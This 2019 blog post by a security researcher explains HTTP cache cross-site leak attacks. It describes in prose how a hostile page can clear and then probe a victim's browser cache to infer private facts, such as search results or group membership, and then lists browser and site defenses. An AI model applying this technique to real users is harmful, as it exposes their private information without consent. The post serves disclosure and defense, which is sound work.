Tuesday, March 19, 2019

[🌐💧💥] HTTP Cache Cross-Site Leaks

In this blog post I want to talk about a cool type of attacks (XSLeaks) that are cooler than what most developers and security researchers might realize.

Almost 10 years ago, Chris Evans described an attack against Yahoo! Mail in which a malicious website could search the email inbox of a visitor to his website, and know if the search had returned results or not. This essentially could have allowed him to search the emails of the user word for word, and get to know a lot about the emails received by the user, from who, and when.

Chris did that by simply checking how long the server would take to respond to a search query (done through the victim's browser so it includes cookies), and it concluded that if it took longer to return, it must have been because the search query had results, and if it returned faster, it probably had no results.

the server has at least a 40ms difference in minimum latency between a query for a word not in the index, and a query for a word in the index
The attack was cool, but since it was based on network timing, it was a bit hard to pull off. Six years later, Nethanel Gelernter and Amir Herzberg went a bit deeper into this attack and named it XSSearch (and used statistics to make it more reliable). In the years that followed, the attacks steadily improved, going beyond timing, to browser "misfeatures" and bugs that made the attacks a lot more stable up to near-perfection. In other words, detecting if a search query has results or not is now almost trivial to accomplish through a variety of tricks.

Today I want to bring attention to one of the tricks, a very reliable mechanism to query the HTTP Cache in all browsers (with caveats). As far as I know, previous attacks in this area relied on timing (cached resources load faster than non-cached resources), and were mostly used for figuring out the victim's browser historygeographic location or fingerprinting.

However, while those attacks were interesting, an interesting variation is:
  1. Delete the cache for a specific resource (or list of resources).
  2. Force the browser to render a website (navigation, or prerender).
  3. Check if the browser cached the resource deleted at (1).
Note that what this variation gives you, is that it allows you to figure out if a website loads a specific resource (image, script, stylesheet, etc) or not. In other words, you can just ask the browser a question like:
When the user opens this website: https://www.facebook.com/me/friends will the profile picture of Chris Evans be requested? Or, in other words, am I friends with Chris Evans on Facebook?
Fortunately, Facebook seems to sign their URLs, so you probably can't do this attack so simply, but how about this instead?
When the user opens this website: https://www.facebook.com/groups/bugbountygroup/about will this script https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/xxx.js be requested? Or in other words, do I have access to the Facebook bugbounty group?
This other attack would be more interesting, as long as there is a resource that loads if the user has access, but doesn't load if the user doesn't have access, then you can figure out if a user has access to something or not.

Again, fortunately Facebook actually preloads all scripts and images regardless of whether the user has access to private groups or not.

Now, the same technique applies to search results! You can query the browser and ask:
When the user opens this website: https://www.facebook.com/messages/?qa=indonesia will this script be requested? Or in other words, has the user talked about visiting Indonesia?
Again, fortunately Facebook actually doesn't issue search queries on messages and requires the user to "confirm" the search query :-).


As you can see, some websites have deployed protection against Cross-Site Leaks in the past year, some more effective than others, and I think that this is one of those few attacks that only large websites try to protect against, but most of the internet is still vulnerable to.

So, now that I've described the attack, here's how to do it! The summary of the trick is that it allows you to do two things:
  1. Delete the HTTP Cache for a specific resource or URL
  2. Query the HTTP Cache to see if the browser cached it
To delete the HTTP Cache, you just have to either issue a POST request to the resource, or use the fetch API with cache: "reload" in a way that returns an error on the server (eg, by setting an overlong HTTP referrer), which will lead to the browser not caching the response, and invalidating the previous cached response.

Then after you navigate the user to the site you want to query (either through link rel=prerender, or by navigating another window or frame), you check if the resource was cached or not. You can check if the resource was cached or not by doing the same trick with the overlong HTTP referrer, because if the resource was cached, it will load successfully, and if not, it'll fail. You can see an example of this attack here (that terjanq was nice enough to setup :-).

Here's a nicer explanation of the attack (with a happy cloud and everything):

Depending on who you are, you might either be excited about this, depressed, angry, or ambivalent, here are some suggestions on how to deal with this:
  1. If you are a website author, you might want to think about whether you have any of these leaks, and maybe try to protect against them (see defenses below).
  2. If you are a security researcher, you might want to check the websites you use to see if they are vulnerable (check caveats below).
  3. If you are a browser vendor, you might want to consider implementing double keyed cache (see caveats below).
You probably are wondering what are these caveats that I've been talking about, so here we go:
  • The attack is "complicated" for Safari users, the reason is because Safari has this thing called "Verified Partitioned Cache", which is a technique for preventing user tracking, but that also accidentally helps with this. The way it works is by keying the cache entries to their origin and to the site that loaded the resource. The attack is still possible (because the caching behavior is based on heuristics), but the details of this are probably worth a different blog post.
  • Chrome will hopefully not be vulnerable anymore - the reason is because Chrome is experimenting with "Split Disk Cache", which is somewhat different from Safari's, but has the side-effect of protecting against this attack. Note that this feature is currently behind a flag in Chrome (--enable-features=SplitCacheByTopFrameOrigin), so test it out and send feedback to Chrome =).
  • Firefox users are vulnerable, but they have a preference they can enable to get similar behavior - this is called "First Party Isolation", and is available as an add-on and as a pref (privacy.firstparty.isolate=true). It takes a similar approach to the one implemented in Chrome a few steps further, and splits not only cache but several other things (such as permissions!), so test it out too, and send feedback to Firefox.
And if you are a web developer and are thinking about ways to defend against this, well, I have good news and bad news:
  • You can just disable HTTP cache. This has some bandwidth and performance consequences, though, so maybe don't do that.
  • You can add CSRF tokens to everything. This breaks all bookmarks that your users might have set, so maybe don't do that.
  • You can use SameSite=strict cookies to authenticate users. This is actually quite surprisingly very well supported across browsers, and doesn't break bookmarks. Note, however, that there are some known bypasses (eg, if the site has some types of open redirects, as well as browser implementation bugs).
  • You can use COOP to slow down attackers (so every attack requires a click). Note however that it is only implemented in Firefox, and even in Firefox is behind a pref (browser.tabs.remote.useCrossOriginOpenerPolicy), so test it out and send feedback to Firefox =).
  • You can do all the crazy things that Facebook apparently tries to do to protect against this! Or take a look at this page with some more ideas.
🌐💧💥

I want to end this blog post by saying that HTTP cache is not the only leak there is, there are a ton more! So protecting against Cache is not enough, you can also detect the length of the page, the JS execution cycles, the content-type, the number of TCP sockets, and many more. if you are a security researcher, please contribute! The XSLeaks wiki is a joint effort among several security researchers (terjanq, lbherrera_, ronmasas, _tsuro, arthursaftnes, kkotowicz, and me) trying to explore the limits of cross-site leaks, and hopefully by working together we can come up with better attacks :-). Contact me on twitter if you want to contribute (DMs are open).

Thanks for reading!